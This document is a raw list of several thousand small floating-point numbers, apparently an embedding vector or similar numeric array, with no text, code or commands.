0.01034538820385933, -0.009182984940707684, 0.011006505228579044, -0.0016727708280086517, 0.010069317184388638, -0.002248523524031043, 0.009473585523664951, 0.010548808611929417, 0.009429995901882648, -0.01060692872852087, -0.0030059018172323704, 0.027011344209313393, -0.02053094655275345, -0.028072036802768707, -0.02746177464723587, 0.038708023726940155, 0.04475252330303192, -0.010461628437042236, 0.009655211120843887, 0.01644800417125225, -0.012045403011143208, -0.012946264818310738, -0.01673860475420952, 0.014922350645065308, -0.017726648598909378, 0.012227028608322144, -0.005368849728256464, 0.002217647386714816, -0.0111082149669528, 0.005521414801478386, 0.002357498975470662, -0.0020741631742566824, 0.014689870178699493, 0.01580868288874626, 0.012096257880330086, -0.009524441324174404, 0.0312395840883255, -0.010556073859333992, 0.0011950957123190165, 0.00912486482411623, -0.007196002174168825, 0.011209925636649132, 0.006545783020555973, -0.0046859378926455975, -0.0033237466122955084, -0.02763613499701023, 0.009749656543135643, 0.008594518527388573, 0.005285301711410284, 0.03638321906328201, -0.002989555709064007, -0.003992128185927868, 0.004006658215075731, -0.003541697049513459, 0.014406533911824226, 0.018612980842590332, 0.009938547387719154, -0.011297105811536312, -0.007759041152894497, -0.004206446465104818, -0.016724076122045517, -0.026023300364613533, -0.023277122527360916, -0.011202660389244556, -0.02747630514204502, -0.004551535006612539, 0.0037778103724122047, 0.019136061891913414, -0.0013276824029162526, 0.014566364698112011, 0.002871499164029956, -0.004206446465104818, -0.008550927974283695, -0.013200541026890278, 0.010323593392968178, 0.002384742721915245, 0.0015410922933369875, 0.03301224857568741, 0.003948538098484278, 0.02301558293402195, 0.023771144449710846, -0.00180808175355196, 0.00505282124504447, 0.02711305394768715, 0.012306943535804749, 0.019121531397104263, -0.01678219623863697, 0.004649612586945295, 0.00014688962255604565, -0.006996213924139738, 0.0075628855265676975, -0.019601022824645042, -0.013062505051493645, -0.011122745461761951, -0.01793006807565689, -0.013106095604598522, 0.003296502633020282, -0.007504765409976244, 0.01871469058096409, 0.006364157423377037, 0.00607718899846077, 0.0205600056797266, 0.0017481453251093626, 0.003336460329592228, 0.010294533334672451, 0.0052199168130755424, 0.010839409194886684, -0.0016873008571565151, 0.01086120493710041, 0.013280455954372883, -0.010388977825641632, -0.011703946627676487, 0.0015692443121224642, -0.004333584103733301, -0.005296199582517147, -0.0026789759285748005, -0.013251395896077156, -0.004943845793604851, 0.0015410922933369875, 0.0035053719766438007, 0.002366580069065094, -0.014849700033664703, -0.0010298165725544095, 0.007399422582238913, -0.015111241489648819, -0.010054787620902061, -0.01463901437819004, -0.01561979204416275, 0.018177079036831856, -0.009168455377221107, -0.005383379757404327, -0.010003931820392609, -0.009270165115594864, -0.008035112172365189, -0.004656877834349871, 0.007548355497419834, -0.005742998328059912, -0.004918418359011412, -0.015910392627120018, -0.0074539100751280785, -0.0027007712051272392, -0.0069380938075482845, -0.00690176896750927, -0.0037669127341359854, -0.026749802753329277, 0.0164189450442791, 0.0067673660814762115, -0.011137275025248528, -0.009255635552108288, 0.024119865149259567, -0.005278036929666996, 0.005993641447275877, -0.0009816858218982816, -0.0037378526758402586, -0.01322233583778143, 0.008659903891384602, -0.023233532905578613, -0.017886478453874588, 0.01727621629834175, 0.0076355356723070145, -0.005365217104554176, -0.01923777163028717, -0.019993335008621216, 0.030542142689228058, -0.029365209862589836, -0.013302250765264034, -0.009902222082018852, 0.0035090046003460884, -0.00005258625606074929, -0.014072343707084656, -0.014384739100933075, 0.002250339835882187, -0.0008490991895087063, -0.010352653451263905, 0.005100043956190348, -0.006527620367705822, 0.008478278294205666, 0.022608742117881775, 0.010592399165034294, 0.008616313338279724, 0.010236413218080997, 0.005441499873995781, 0.004980171099305153, -0.002154078334569931, 0.007788101211190224, -0.011362491175532341, -0.005296199582517147, 0.00199243170209229, -0.009807776659727097, -0.020182223990559578, 0.010338122956454754, 0.017799299210309982, -0.004420764744281769, 0.012423183768987656, -0.004827605560421944, 0.014646279625594616, -0.010338122956454754, 0.02154804766178131, 0.001970636658370495, 0.000858180457726121, -0.010839409194886684, 0.012641134671866894, -0.008863324299454689, -0.022477971389889717, -0.004126531071960926, 0.02826092764735222, 0.03975418955087662, -0.01454456988722086, 0.0012177989119663835, -0.003425456816330552, -0.010599663481116295, 0.01593945361673832, -0.001996064092963934, -0.013607381843030453, 0.029219908639788628, 0.00013247309834696352, 0.0148061104118824, 0.0009344631689600646, -0.0033001352567225695, -0.01875828020274639, 0.011137275025248528, 0.010309062898159027, 0.0041519589722156525, -0.00019513389270287007, -0.015590731985867023, -0.01405054796487093, 0.0005961856804788113, 0.002386559033766389, 0.022274550050497055, -0.02135915867984295, -0.005023761186748743, 0.02089419588446617, 0.010904794558882713, 0.019281363114714622, -0.030658382922410965, 0.027025872841477394, 0.0015256541082635522, 0.003076735883951187, -0.0026807922404259443, 0.006694715470075607, 0.010643254034221172, 0.027912205085158348, -0.016564244404435158, 0.0010134702315554023, -0.004805810749530792, 0.0033019515685737133, 0.0011024667182937264, -0.016695015132427216, -0.007087026722729206, -0.011311635375022888, 0.019789913669228554, -0.017014676705002785, -0.015706973150372505, -0.014668074436485767, -0.014036018401384354, -0.01405054796487093, -0.0131496861577034, -0.009306490421295166, 0.017683058977127075, -0.002593612065538764, 0.008078701794147491, -0.000649311114102602, 0.0075628855265676975, 0.005405174568295479, 0.011202660389244556, 0.00718873692676425, 0.005644920282065868, -0.011965487152338028, 0.006996213924139738, -0.004998333752155304, -0.025848940014839172, 0.011064625345170498, -0.007337669841945171, -0.0045297397300601006, 0.021242918446660042, 0.03536611795425415, 0.0009235656470991671, 0.001921597751788795, 0.0022975625470280647, 0.016491595655679703, 0.01564885303378105, -0.020167695358395576, 0.0029514143243432045, 0.005692142993211746, 0.011856512166559696, -0.0044389269314706326, 0.012408653274178505, 0.017377927899360657, -0.011362491175532341, -0.0008041468681767583, -0.014842435717582703, -0.009524441324174404, -0.0013630993198603392, -0.003875887952744961, 0.007130616810172796, -0.003212955081835389, 0.009422730654478073, 0.0028769478667527437, -0.016070224344730377, -0.008463747799396515, -0.021998479962348938, 0.019513843581080437, -0.018133489415049553, 0.02874041721224785, -0.03864990547299385, 0.003398213069885969, -0.01938307285308838, 0.014580894261598587, 0.012604809366166592, 0.0005503252614289522, -0.04158497229218483, 0.011217190884053707, -0.000903586857020855, -0.0023720290046185255, 0.0027934000827372074, 0.0002849249867722392, -0.018990762531757355, -0.011064625345170498, 0.016854844987392426, -0.007991521619260311, 0.01593945361673832, 0.012285148724913597, 0.019310422241687775, 0.011885572224855423, 0.009023154154419899, 0.02170787937939167, -0.01855486072599888, 0.012684724293649197, 0.002150445943698287, 0.02401815541088581, 0.02844981662929058, 0.009270165115594864, -0.014232173562049866, 0.000013756712178292219, -0.009785981848835945, -0.011427875608205795, 0.021330097690224648, -0.00115967879537493, -0.008856059052050114, 0.0062152245081961155, 0.004871195647865534, -0.014471919275820255, -0.022637801244854927, -0.014253968372941017, -0.006022701505571604, 0.01692749559879303, -0.0029278029687702656, -0.00041070065344683826, -0.005815648473799229, -0.00002180924821004737, -0.028653237968683243, -0.0029259866569191217, 0.005790220573544502, -0.02220189943909645, -0.007047069258987904, 0.023582253605127335, 0.01093385461717844, -0.013839862309396267, -0.012771904468536377, 0.00006674737232970074, 0.018307849764823914, -0.00012679729843512177, 0.02135915867984295, -0.001018919050693512, 0.013643707148730755, 0.0035743897315114737, 0.0022757675033062696, 0.010541543364524841, -0.005081881303340197, 0.017465107142925262, -0.0050455559976398945, 0.006800058297812939, -0.0063968501053750515, 0.01839503087103367, -0.0024501278530806303, 0.03158830478787422, 0.013193275779485703, 0.007548355497419834, 0.013883452862501144, 0.025354918092489243, -0.01740698702633381, -0.0044316621497273445, -0.005928256083279848, 0.0045115770772099495, -0.01662236452102661, -0.03251822665333748, -0.007116086781024933, 0.02567457966506481, 0.0005834719049744308, -0.0026916898787021637, 0.003033145796507597, 0.0010379897430539131, -0.019848033785820007, -0.009749656543135643, -0.0007710002246312797, 0.009182984940707684, -0.0005480549298226833, -0.02284122258424759, -0.004242771305143833, 0.015053121373057365, -0.008805204182863235, 0.012946264818310738, -0.024570297449827194, 0.009328285232186317, -0.027505364269018173, -0.007330405060201883, 0.0024446791503578424, 0.0005167245399206877, 0.011660357005894184, 0.011042829602956772, 0.023480543866753578, -0.015227481722831726, 0.007991521619260311, 0.010890264995396137, -0.005619492847472429, 0.036266978830099106, -0.019513843581080437, 0.016520654782652855, -0.004497047048062086, 0.02682245336472988, 0.015183891169726849, -0.015706973150372505, 0.009284695610404015, 0.011900102719664574, 0.0059609487652778625, -0.02365490421652794, 0.02255062200129032, -0.021504458039999008, 0.00847101304680109, 0.009771451354026794, -0.01992068439722061, -0.009887691587209702, 0.0005412439932115376, 0.01907794177532196, 0.000996215851046145, 0.0037142413202673197, 0.021635228767991066, 0.00031875274726189673, -0.014711664989590645, 0.023742085322737694, -0.0011233537225052714, 0.010178293101489544, 0.0023520500399172306, 0.0007619189564138651, -0.02660450153052807, -0.001549265463836491, 0.015212951228022575, -0.011456936597824097, -0.014580894261598587, -0.007199634797871113, -0.015895863994956017, -0.0008359313360415399, -0.020647186785936356, -0.006531252525746822, 0.004144693724811077, -0.024730127304792404, -0.011166335083544254, 0.0025173292960971594, 0.015096710994839668, 0.016244584694504738, -0.0143774738535285, 0.005165428854525089, -0.017203567549586296, -0.024541236460208893, -0.005957316141575575, 0.0034908419474959373, -0.009735126048326492, 0.0011624031467363238, -0.008420158177614212, 0.007065231911838055, -0.0007696380489505827, 0.014762519858777523, -0.025267738848924637, -0.04178839176893234, -0.007177839521318674, -0.0005462386761792004, 0.0009571663686074317, 0.004787648096680641, -0.026342961937189102, 0.012553954496979713, -0.0008459207601845264, -0.019034352153539658, 0.0052199168130755424, -0.012096257880330086, -0.014319353736937046, -0.017479637637734413, 0.012263352982699871, 0.018947171047329903, 0.004551535006612539, -0.004217343870550394, -0.018656570464372635, 0.013498406857252121, 0.012612074613571167, -0.005419704597443342, 0.002751626307144761, 0.022754041478037834, -0.00007673677464481443, -0.018612980842590332, -0.005357951857149601, -0.013040710240602493, -0.010127437300980091, 0.01010564249008894, 0.007599210832268, 0.005198121536523104, -0.017392456531524658, 0.009771451354026794, 0.008601783774793148, 0.010003931820392609, 0.024875428527593613, 0.016070224344730377, 0.004714997950941324, 0.0025155129842460155, 0.011246250942349434, 0.03211138769984245, 0.00662206532433629, 0.004181019030511379, 0.011536851525306702, 0.002110488247126341, 0.009684271179139614, 0.02567457966506481, -0.01971726305782795, -0.0032474638428539038, -0.0068400162272155285, -0.022724982351064682, 0.016535185277462006, 0.009836836718022823, -0.0015429086051881313, 0.0031403047032654285, -0.01691296510398388, 0.033302851021289825, 0.013418491929769516, -0.014798845164477825, -0.008550927974283695, -0.02204206958413124, 0.014813375659286976, 0.02366943471133709, 0.004827605560421944, 0.005830178502947092, 0.028536997735500336, 0.011972752399742603, 0.014922350645065308, -0.009379140101373196, 0.0010143783874809742, -0.016665956005454063, -0.02070530690252781, -0.020298466086387634, 0.019601022824645042, -0.011791126802563667, 0.014319353736937046, -0.02317541278898716, 0.0075556207448244095, 0.009044949896633625, -0.009459055960178375, -0.02170787937939167, 0.0067746308632195, 0.0050382912158966064, -0.015474491752684116, -0.009706065990030766, -0.016171934083104134, -0.01596851274371147, -0.011071889661252499, -0.005121838767081499, 0.02172240987420082, 0.010527013801038265, -0.012321473099291325, -0.016404414549469948, 0.015082181431353092, -0.015183891169726849, 0.01306977029889822, 0.0020560005214065313, -0.005201754160225391, -0.01777023822069168, 0.000011365782484062947, 0.01595398411154747, -0.006160736549645662, 0.018118958920240402, -0.02844981662929058, 0.016491595655679703, 0.0003414559178054333, -0.0005044647841714323, -0.014195848256349564, -0.017130916938185692, -0.009604356251657009, -0.010381713509559631, -0.02156257815659046, 0.001063417294062674, 0.011071889661252499, 0.027069464325904846, 0.009531705640256405, 0.02417798526585102, 0.014522774145007133, -0.01537278201431036, 0.0014330251142382622, 0.016186464577913284, 0.00030513081583194435, 0.003285605227574706, 0.01267019473016262, -0.03202420845627785, -0.008965034037828445, 0.005307096987962723, -0.0045297397300601006, -0.007065231911838055, -0.010410773567855358, 0.03275071084499359, -0.008347507566213608, 0.020429234951734543, -0.03074556402862072, 0.007846221327781677, -0.0063133020885288715, 0.005437867250293493, 0.006669288035482168, 0.027316473424434662, 0.0271275844424963, 0.010817614383995533, 0.007297712378203869, -0.015736032277345657, -0.027984855696558952, -0.000008542074283468537, 0.0060408636927604675, -0.004130163695663214, 0.012786434963345528, -0.021431807428598404, 0.007068864069879055, -0.005804750602692366, 0.00463871518149972, 0.01824972964823246, 0.034959275275468826, -0.02119932696223259, -0.02432328648865223, -0.012161643244326115, -0.021083086729049683, -0.008921444416046143, -0.0033655203878879547, -0.009321019984781742, 0.004736792761832476, 0.0010525197722017765, 0.008151352405548096, -0.00911033432930708, -0.009117599576711655, -0.02057453617453575, 0.0065603130497038364, -0.0238292645663023, -0.0238292645663023, -0.00023792940191924572, -0.010665048845112324, -0.008347507566213608, -0.010309062898159027, 0.009059479460120201, 0.01496594026684761, 0.014849700033664703, 0.027331003919243813, -0.006149839144200087, 0.006338729523122311, 0.021460868418216705, 0.006375054828822613, 0.019673673436045647, -0.008696228265762329, -0.01380353793501854, 0.015852272510528564, 0.009851367212831974, 0.006258814595639706, -0.007050701882690191, -0.009095804765820503, 0.008594518527388573, 0.02169334888458252, -0.013687296770513058, 0.018932640552520752, -0.0045297397300601006, -0.01396336778998375, 0.0010752229718491435, 0.010069317184388638, 0.004598757717758417, 0.005721203051507473, 0.002497350564226508, 0.008957769721746445, -0.008943239226937294, -0.02945239096879959, -0.0009108518715947866, 0.014864230528473854, 0.00039026778540574014, 0.0013476611347869039, -0.01630270481109619, 0.005855605937540531, -0.0443456806242466, 0.009030419401824474, -0.007388525176793337, -0.007759041152894497, 0.00016187371511477977, 0.009190250188112259, 0.015881333500146866, 0.024904487654566765, -0.005615860223770142, -0.007206899579614401, 0.011384285986423492, 0.017726648598909378, -0.01823519915342331, 0.0037378526758402586, 0.008834264241158962, -0.0003893596585839987, 0.014842435717582703, 0.017552288249135017, 0.012771904468536377, -0.0262993723154068, 0.008245797827839851, 0.021983949467539787, -0.003127590985968709, 0.03420371189713478, -0.007802631240338087, -0.01662236452102661, 0.007065231911838055, -0.008020581677556038, -0.017305277287960052, 0.004304524045437574, -0.014980470761656761, 0.0015474491519853473, 0.017842888832092285, -0.002778870053589344, -0.006694715470075607, 0.013585587032139301, -0.002940516686066985, 0.005339789669960737, 0.004359012003988028, 0.000534432998392731, 0.01463901437819004, 0.005452397279441357, -0.006019068881869316, -0.01660783588886261, 0.026386551558971405, -0.004900255706161261, -0.0029568630270659924, -0.030222482979297638, -0.013941572979092598, -0.0033709690906107426, 0.004820340778678656, 0.008049641735851765, 0.0036652025301009417, -0.010410773567855358, 0.02085060626268387, -0.015271071344614029, 0.004315421916544437, -0.005372481886297464, 0.0002501891285646707, 0.008180412463843822, 0.018656570464372635, -0.036906301975250244, -0.014384739100933075, -0.00690176896750927, -0.0013494774466380477, 0.0254856888204813, 0.001275010989047587, -0.006324199493974447, -0.013135155662894249, -0.013709092512726784, 0.0063786874525249004, 0.006429542321711779, -0.010381713509559631, 0.015706973150372505, 0.007933401502668858, -0.0008241256582550704, -0.012401388958096504, -0.012859084643423557, 0.0050455559976398945, -0.003363704076036811, -0.016317233443260193, 0.018148019909858704, -0.003821400459855795, 0.0059609487652778625, -0.00426819920539856, 0.007181472145020962, 0.000039617061702301726, -0.006698348093777895, -0.005278036929666996, 0.015329191461205482, 0.02185317873954773, 0.00033691528369672596, 0.026924163103103638, 0.02008051425218582, 0.013905247673392296, 0.014413799159228802, -0.015314661897718906, -0.011805657297372818, 0.010091111995279789, 0.00912486482411623, -0.020589066669344902, -0.00001731118027237244, -0.009459055960178375, -0.0008654454723000526, -0.007889811880886555, 0.022754041478037834, 0.015387311577796936, -0.0011896470095962286, -0.019150592386722565, 0.005383379757404327, -0.035278934985399246, 0.0062878746539354324, -0.003636142471805215, -0.016171934083104134, 0.012336003594100475, -0.004649612586945295, -0.0006352351629175246, -0.0039957608096301556, 0.004449824802577496, -0.0050637186504900455, 0.01289540994912386, 0.036412280052900314, 0.003803237807005644, 0.015271071344614029, 0.003770545357838273, 0.012641134671866894, -0.0055068847723305225, -0.01955743320286274, -0.00768639100715518, -0.028406227007508278, 0.034959275275468826, -0.0033746017143130302, 0.020342055708169937, -0.01675313524901867, -0.01489329058676958, 0.008514603599905968, -0.0032474638428539038, 0.031152404844760895, -0.010214617475867271, 0.01535825151950121, 0.011318900622427464, -0.012147112749516964, -0.0057720583863556385, -0.007257754914462566, -0.0019343114690855145, 0.00607718899846077, -0.003636142471805215, 0.007021641358733177, 0.009357345290482044, 0.009168455377221107, 0.005659450311213732, -0.002110488247126341, -0.01925230212509632, -0.017377927899360657, 0.019935214892029762, -0.016055693849921227, 0.016724076122045517, -0.01561979204416275, -0.019848033785820007, 0.0027007712051272392, -0.005165428854525089, 0.018671100959181786, 0.003897682996466756, 0.00814408715814352, 0.01676766574382782, 0.002644467167556286, 0.009916751645505428, 0.000739669834729284, 0.005543210078030825, -0.00020637197303585708, 0.01053427904844284, 0.0001862796489149332, 0.007254122290760279, -0.0015610711416229606, 0.00600817147642374, 0.008630843833088875, 0.01742151752114296, 0.014297558926045895, -0.01489329058676958, -0.0016491594724357128, 0.010243677534162998, 0.018278788775205612, 0.00505282124504447, -0.0005253517301753163, -0.004359012003988028, -0.014210378751158714, -0.008616313338279724, 0.036906301975250244, 0.003401845460757613, -0.0014866046840324998, -0.01182745210826397, 0.0065675778314471245, -0.016854844987392426, 0.01778476871550083, 0.006382320076227188, -0.018380500376224518, -0.010032991878688335, 0.002273951191455126, 0.014086873270571232, -0.013454816304147243, -0.003588919760659337, 0.004235506523400545, -0.010323593392968178, 0.007388525176793337, 0.0007101556984707713, -0.011900102719664574, 0.0246865376830101, -0.01790100894868374, 0.003981230780482292, 0.008078701794147491, -0.018162548542022705, 0.002315724967047572, -0.027214763686060905, 0.0021667920518666506, -0.006160736549645662, 0.0025100642815232277, 0.007613740861415863, -0.004798545502126217, -0.0001795822026906535, -0.005644920282065868, 0.008020581677556038, 0.013098830357193947, 0.004021188244223595, 0.008398362435400486, 0.016157403588294983, 0.013491141609847546, -0.01939760334789753, 0.009153924882411957, 0.0019597390200942755, -0.02846434712409973, -0.0312977060675621, -0.014689870178699493, -0.0012877247063443065, -0.006970786489546299, 0.005634022876620293, 0.0069199311546981335, -0.007025273982435465, 0.00579385319724679, -0.008863324299454689, -0.01406507845968008, -0.003358255373314023, 0.017392456531524658, 0.004714997950941324, 0.013665501959621906, -0.02449764683842659, 0.014951410703361034, 0.0020251241512596607, 0.00324564753100276, -0.00871075876057148, -0.008391098119318485, -0.006175266578793526, 0.0036906299646943808, 0.003129407297819853, -0.003966700751334429, 0.01544543169438839, -0.01856939122080803, 0.012575749307870865, 0.021010437980294228, -0.002103223232552409, -0.01625911332666874, -0.006872708909213543, 0.006102616433054209, -0.007788101211190224, 0.02298652194440365, -0.00805690698325634, -0.000948085100390017, -0.009371875785291195, -0.013062505051493645, 0.03193702548742294, 0.0040502483025193214, 0.012365063652396202, 0.00804237648844719, 0.011100949719548225, 0.0012595728039741516, -0.013033444993197918, 0.012851820327341557, -0.029699400067329407, -0.008449218235909939, 0.01447918452322483, 0.010003931820392609, 0.011079154908657074, 0.003846827894449234, 0.024381406605243683, -0.04466534033417702, -0.005986376199871302, -0.00703253922984004, -0.01158770639449358, 0.0033237466122955084, -0.006073556374758482, 0.00731950718909502, 0.007751775905489922, -0.005223548971116543, 0.005579535383731127, 0.02776690572500229, -0.014036018401384354, -0.032140448689460754, 0.008311182260513306, 0.0038577255327254534, -0.006098984275013208, 0.004489782266318798, 0.0014375657774508, 0.05806203931570053, 0.0036652025301009417, -0.0013494774466380477, -0.02069077640771866, -0.012147112749516964, 0.012161643244326115, 0.00028151951846666634, -0.006218857131898403, -0.007628270890563726, 0.007221429608762264, -0.006738306023180485, 0.011130010709166527, -0.00468230526894331, -0.00912486482411623, -0.012880880385637283, 0.0052453442476689816, 0.01592492312192917, -0.006237019319087267, 0.007737245876342058, -0.006327832117676735, 0.013781742192804813, 0.008187677711248398, -0.03089086338877678, -0.01141334604471922, -0.009844101965427399, -0.012968060560524464, 0.0008899649255909026, -0.030803684145212173, 0.010635988786816597, 0.02122838795185089, -0.009226575493812561, -0.00222127977758646, -0.015096710994839668, -0.027345534414052963, 0.011064625345170498, 0.014827905222773552, 0.013861658051609993, 0.002402905374765396, 0.0032747075892984867, 0.0026008770801126957, 0.013847127556800842, 0.0013285904424265027, 0.009335550479590893, -0.013614647090435028, -0.010359917767345905, -0.0000472510073450394, -0.01487876009196043, -0.026895103976130486, 0.020167695358395576, -0.011340695433318615, 0.0026353858411312103, 0.0008640832966193557, -0.0039013156201690435, 0.012721049599349499, 0.013258661143481731, -0.015605262480676174, -0.016186464577913284, 0.0036924462765455246, -0.004239139147102833, 0.007512030191719532, 0.016477065160870552, 0.006069924216717482, -0.010396243073046207, -0.0016182831022888422, 0.02516602911055088, -0.007504765409976244, 0.00468230526894331, -0.015852272510528564, -0.0025772657245397568, 0.011050094850361347, 0.008347507566213608, -0.0014475551433861256, -0.008870589546859264, 0.0016101100482046604, 0.014697134494781494, 0.003027697093784809, 0.004017556086182594, 0.015750562772154808, 0.0035980010870844126, -0.014588159509003162, 0.0013367636129260063, -0.002711668610572815, 0.015881333500146866, -0.003734220052137971, 0.0060408636927604675, -0.027912205085158348, -0.005270771682262421, 0.02432328648865223, 0.01463901437819004, 0.022419851273298264, 0.014174053445458412, -0.018336910754442215, 0.011427875608205795, 0.01324413064867258, 0.02381473407149315, -0.013171480968594551, 0.014115933328866959, -0.01201634295284748, -0.009815041907131672, 0.011689417064189911, 0.00365793751552701, 0.028362637385725975, 0.005950051359832287, 0.008921444416046143, -0.022957462817430496, -0.0037269550375640392, 0.01758134737610817, -0.005684877745807171, -0.018453150987625122, 0.013200541026890278, 0.00804237648844719, -0.012270618230104446, 0.0056630829349160194, 0.004653245210647583, -0.017305277287960052, 0.007366729900240898, 0.008412892930209637, -0.011231720447540283, -0.0011060992255806923, -0.01941213198006153, -0.006029966287314892, -0.00007435293809976429, -0.000057098513934761286, -0.03190796822309494, 0.009103070013225079, -0.011420611292123795, -0.023277122527360916, -0.015401842072606087, 0.004351746756583452, -0.019281363114714622, -0.009175719693303108, -0.025093378499150276, 0.03074556402862072, -0.00879793893545866, -0.0045115770772099495, -0.0230301134288311, 0.01487876009196043, -0.0012468589702621102, 0.007087026722729206, 0.007141514215618372, -0.022129250690340996, -0.015706973150372505, 0.0008450126042589545, -0.004424396902322769, -0.015430902130901814, 0.006331464741379023, 0.016636895015835762, 0.011711211875081062, -0.0009462688467465341, 0.011907367035746574, -0.01871469058096409, -0.020487355068325996, 0.02073436602950096, 0.017029207199811935, -0.0172471571713686, -0.006367789581418037, 0.0038395628798753023, -0.004631449934095144, 0.025703640654683113, 0.005583167541772127, 0.014907820150256157, -0.0014448307920247316, -0.019281363114714622, -0.014573629945516586, 0.00699258130043745, 0.0005067351157777011, -0.0034418031573295593, -0.011558646336197853, 0.004863930866122246, 0.0067673660814762115, -0.005321627017110586, 0.010403508320450783, 0.0063133020885288715, 0.0048748282715678215, -0.02663356252014637, -0.016520654782652855, 0.02103949710726738, 0.010171027854084969, -0.017552288249135017, -0.011246250942349434, 0.003963068127632141, -0.004064778331667185, -0.013207806274294853, 0.00351626961492002, 0.003992128185927868, -0.00012963519839104265, 0.0038286654744297266, 0.011892837472259998, -0.019165122881531715, 0.019324952736496925, -0.01069410890340805, 0.007889811880886555, -0.012299678288400173, 0.027360064908862114, -0.012394123710691929, 0.010991974733769894, 0.01660783588886261, -0.0024156190920621157, -0.004500679671764374, -0.00592462345957756, 0.009807776659727097, -0.028057506307959557, -0.009459055960178375, 0.009321019984781742, -0.00033010434708558023, -0.01579415239393711, -0.010897529311478138, -0.010890264995396137, 0.006059026345610619, 0.018162548542022705, -0.002470106817781925, 0.0020069617312401533, 0.009771451354026794, 0.012866349890828133, 0.020342055708169937, -0.005274404305964708, 0.005492354743182659, 0.0006179807242006063, 0.0004817616136278957, -0.0131496861577034, -0.017014676705002785, -0.017799299210309982, -0.010468893684446812, 0.00426819920539856, 0.0017000145744532347, 0.011958222836256027, 0.009517176076769829, -0.004816708154976368, 0.0020487355068325996, -0.022594211623072624, 0.007737245876342058, 0.0032293011900037527, 0.011195395141839981, 0.0030258807819336653, -0.007097924128174782, -0.004998333752155304, -0.02349507436156273, 0.000440214789705351, 0.018453150987625122, -0.004057513549923897, 0.023771144449710846, 0.008870589546859264, -0.017203567549586296, 0.019513843581080437, 0.02106855809688568, 0.01808989979326725, -0.003703343914821744, -0.017828358337283134, 0.005514150019735098, 0.019775383174419403, 0.011921897530555725, 0.0009153924765996635, 0.016564244404435158, -0.002410170389339328, -0.011369755491614342, -0.017639467492699623, 0.02563099004328251, 0.000627061992418021, -0.007490235380828381, -0.004424396902322769, -0.0047767506912350655, -0.008594518527388573, 0.014559099450707436, -0.012125317938625813, -0.008485542610287666, -0.016331763938069344, -0.012597544118762016, 0.00016720897110644728, 0.026560911908745766, 0.002266686176881194, -0.0018480394501239061, -0.01117360033094883, 0.003825032850727439, -0.006117146462202072, -0.020908726379275322, 0.010338122956454754, 0.015706973150372505, -0.006015436258167028, -0.0005476008518598974, -0.0021904034074395895, 0.006912666372954845, 0.005855605937540531, -0.0003961705951951444, -0.003752382704988122, 0.031646426767110825, -0.018816400319337845, -0.02205660007894039, -0.014660810120403767, -0.004642347805202007, -0.01625911332666874, -0.00820947252213955, -0.004598757717758417, 0.0020451031159609556, 0.006792793516069651, 0.0023248062934726477, 0.00600817147642374, 0.005100043956190348, 0.002499166876077652, -0.004220976494252682, 0.017639467492699623, -0.01777023822069168, -0.006883606314659119, 0.014813375659286976, -0.012546689249575138, -0.006091719027608633, -0.002477371832355857, -0.025195088237524033, -0.0014875128399580717, -0.021954890340566635, -0.007468440104275942, -0.003730587661266327, 0.000926289998460561, -0.005699407774955034, 0.026996813714504242, -0.016142873093485832, 0.010882999747991562, -0.010737699456512928, -0.01158770639449358, -0.00031171474256552756, 0.02301558293402195, -0.012277883477509022, 0.018162548542022705, -0.004569697193801403, -0.010410773567855358, -0.013142420910298824, 0.002915089251473546, 0.029190849512815475, -0.017189037054777145, 0.018118958920240402, -0.010527013801038265, -0.0032293011900037527, 0.022318141534924507, -0.004827605560421944, -0.018148019909858704, -0.012590278871357441, -0.017319807782769203, -0.00030944444006308913, 0.010817614383995533, -0.007079761940985918, -0.023974565789103508, 0.009713331237435341, -0.017886478453874588, 0.006178899202495813, 0.00034622359089553356, 0.005179958883672953, 0.0018389581236988306, -0.009531705640256405, -0.018031779676675797, 0.008115027099847794, 0.002114120637997985, 0.02038564532995224, -0.0002703949576243758, 0.008572723716497421, -0.009066744707524776, -0.024555766955018044, 0.014036018401384354, -0.009488116018474102, 0.0031312236096709967, 0.01200181245803833, -0.010476158931851387, -0.05111667886376381, 0.004428029526025057, 0.003656121203675866, -0.01710185594856739, 0.002706219907850027, -0.001134251244366169, 0.014413799159228802, 0.0050382912158966064, 0.014297558926045895, 0.022739510983228683, -0.0028097464237362146, 0.008173147216439247, -0.014755255542695522, -0.015706973150372505, 0.017479637637734413, 0.018293319270014763, 0.010570603422820568, -0.00772998109459877, 0.009204779751598835, 0.009553501382470131, 0.004780382849276066, -0.003803237807005644, 0.007591945584863424, -0.030658382922410965, -0.007337669841945171, -0.01824972964823246, 0.002826092764735222, 0.020007863640785217, 0.007962461560964584, 0.017813827842473984, 0.003706976305693388, 0.0012423184234648943, 0.01842408999800682, 0.011238985694944859, -0.007809896022081375, 0.001739064115099609, -0.01298259012401104, -0.0062951394356787205, 0.004791280720382929, 0.008311182260513306, -0.022928401827812195, -0.009117599576711655, 0.046641428023576736, -0.004678672645241022, 0.011297105811536312, 0.012357798404991627, 0.012321473099291325, 0.008667168207466602, -0.011812922544777393, 0.0007664595614187419, -0.015721503645181656, -0.02317541278898716, -0.004518842324614525, -0.02021128498017788, -0.0006120778853073716, -0.030454963445663452, -0.00829665269702673, 0.0063060373067855835, 0.0037887077778577805, 0.025703640654683113, -0.014072343707084656, -0.022143779322504997, 0.006814588326960802, -0.010505218990147114, -0.006084454245865345, -0.010134702548384666, -0.008434687741100788, 0.017232626676559448, 0.015067650936543941, 0.021577108651399612, 0.003380050417035818, -0.011100949719548225, 0.02645920217037201, 0.006959889084100723, -0.004202813841402531, -0.0057611605152487755, -0.013302250765264034, -0.006974419113248587, -0.009982137009501457, 0.01808989979326725, -0.005601330194622278, 0.007838956080377102, -0.002012410433962941, 0.0014475551433861256, 0.005913726054131985, -0.00731587503105402, 0.016171934083104134, -0.007366729900240898, 0.011478731408715248, 0.006545783020555973, 0.014406533911824226, -0.0016400782624259591, -0.006683818064630032, -0.000764643307775259, -0.006611167918890715, 0.01923777163028717, 0.0020305730868130922, 0.013251395896077156, 0.013665501959621906, -0.00041796566802076995, -0.0035108206793665886, -0.01627364382147789, 0.0016854845453053713, -0.017159976065158844, -0.020952317863702774, 0.0015147565864026546, -0.034610554575920105, 0.01415225863456726, 0.012880880385637283, 0.0189035814255476, -0.006752836052328348, 0.02648826129734516, 0.0028805802576243877, -0.0017299827886745334, -0.028566056862473488, 0.010563339106738567, -0.001113364240154624, 0.0006747387233190238, -0.012139848433434963, -0.015300131402909756, -0.004260933957993984, -0.0029732093680649996, -0.004035718273371458, -0.005321627017110586, 0.02204206958413124, -0.009146659635007381, -0.020269405096769333, -0.033767811954021454, -0.01595398411154747, 0.001157862483523786, 